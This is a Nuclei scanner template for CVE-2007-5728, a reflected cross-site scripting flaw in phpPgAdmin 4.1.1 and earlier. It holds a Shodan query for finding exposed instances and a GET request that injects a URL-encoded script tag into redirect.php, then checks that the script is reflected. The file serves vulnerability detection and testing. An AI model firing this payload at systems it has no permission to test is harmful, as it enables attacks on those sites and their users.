nuclei-templates/http/cves/2007/CVE-2007-5728.yaml

53 lines
1.9 KiB
YAML

id: CVE-2007-5728
info:
name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
remediation: |
Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
reference:
- https://www.exploit-db.com/exploits/30090
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
- http://www.debian.org/security/2008/dsa-1693
- http://www.novell.com/linux/security/advisories/2007_24_sr.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2007-5728
cwe-id: CWE-79
epss-score: 0.02361
epss-percentile: 0.88643
cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phppgadmin
product: phppgadmin
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
http:
- method: GET
path:
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
- 'phpPgAdmin'
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022003967d4428173fa3a66e3f0c4d0f92509435ecafe0351d5a934b605d591832fa022006af89ae1abc83ea90123587614406e808c06f93a4f3e73d4636015dd755ed97:922c64590222798bb761d5b6d8e72950